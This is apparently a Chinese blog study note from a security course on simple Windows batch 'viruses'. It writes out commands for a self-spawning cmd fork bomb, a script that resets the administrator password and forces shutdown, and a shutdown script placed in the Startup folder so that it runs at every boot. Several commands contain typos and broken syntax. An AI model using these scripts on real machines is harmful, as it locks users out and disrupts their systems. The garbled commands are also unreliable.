泷羽sec学习打卡-Windows基础virus

声明
学习视频来自B站UP主 泷羽sec,如涉及侵权马上删除文章 笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负


关于windows virus的那些事儿


一、Windows-Virus

资源耗尽之无限弹窗cmd-virus测试

将start cmd命令写入到cmd.txt文件中

csharp 复制代码
echo start cmd >cmd.txt

追加>>将%0写入到cmd.txt文件中

csharp 复制代码
echo %0 >> cmd.txt

查看cmd.txt文件内容

type cmd.txt

重命名 cmd.txt文件更改未cmd.bat批处理文件

csharp 复制代码
ren cdm.txt cmd.bat

执行cmd.bat文件

python 复制代码
call c:\users\root cmd.bat

锁机virus测试

net user administrator 123456写入到c:\windows\Temp\virus.bat批处理文件中

python 复制代码
echo net user administrator syssys > c:\windows\Temp\text.txt
net user administrator 123456:更改用户administrator的password

shutdown /s /t /f 0追加写入c:\windows\Temp\text.txt批处理文件中

python 复制代码
echo shutdown /s /t /f 0 >> c:\windows\Temp\text.txt

注意:win7没有/n这个参数,这个/n是linux中的
shutdown /n /t 0:直接0s立即执行关闭主机

/n:这个选项是不调用 init 程序进行关机,而是由 shutdown 命令自己直接进行关机。

init 命令是 Unix 和类 Unix 操作系统(如 Linux)中的一个系统级命令,用于初始化系统或改变运行级别。

查看指定路径下的text.txt文件内容

python 复制代码
type c:\windows\Temp\text.txt

切换到指定文件路径

python 复制代码
cd c:\windows\Temp

重命令文件并更改格式txt为bat

python 复制代码
ren text.txt test.bat
dir 查看路径c:\windows\Temp所有目录以及文件

缺点太过明显,需要指定路径才能运行,其次call文件需要等待上一个bat程序执行完才会执行,其次需要管理员权限运行cmd

使用新命令:新建cmd窗口执行bat,也多一个进程

python 复制代码
cmd /c c:\windows\Temp\test.bat

这个登录的时候必须是超级管理员用户才会生效,使用其它权限用户依然可以登录,所以理论上成立,实际还需要更改为所有用户才行。

无限重启virus测试

写入立即执行关闭命令到my.bat

csharp 复制代码
echo shutdown /s /t 0 > c:\windows\Temp\my.bat

用是将c:\windows\Temp目录下的my.bat文件复制到当前用户的启动文件夹中,使得每次计算机启动时,my.bat文件都会被执行。

csharp 复制代码
copy c:\windows\Temp\my.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

开机自启动目录

csharp 复制代码
"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

重启自动清空缓存测试

csharp 复制代码
c:\windows\Temp\my.bat 

好好好,看来限制是非常多,在win10中首先路径需要正确,其次需要有超级管理员的权限才可以。分享就到这里,下来实践。

还是那句话

实践是检验真理的唯一标准

相关推荐
非概念2 分钟前
stm32学习笔记----51单片机和stm32单片机的区别
笔记·stm32·单片机·学习·51单片机
nnloveswc21 分钟前
PTE-中间件安全
安全
青锐CC24 分钟前
webman使用中间件验证指定的控制器及方法[青锐CC]
中间件·前端框架·php
冰水°36 分钟前
3.1_文件上传漏洞
安全·网络安全·文件上传·条件竞争·.htaccess·文件上传绕过
无敌最俊朗@1 小时前
stm32学习之路——八种GPIO口工作模式
c语言·stm32·单片机·学习
ZJ_.2 小时前
Electron 沙盒模式与预加载脚本:保障桌面应用安全的关键机制
开发语言·前端·javascript·vue.js·安全·electron·node.js
EterNity_TiMe_2 小时前
【论文复现】STM32设计的物联网智能鱼缸
stm32·单片机·嵌入式硬件·物联网·学习·性能优化
Wh1teR0se2 小时前
[ACTF2020 新生赛]Upload 1--详细解析
web安全·网络安全
星海幻影2 小时前
网络基础-超文本协议与内外网划分(超长版)
服务器·网络·安全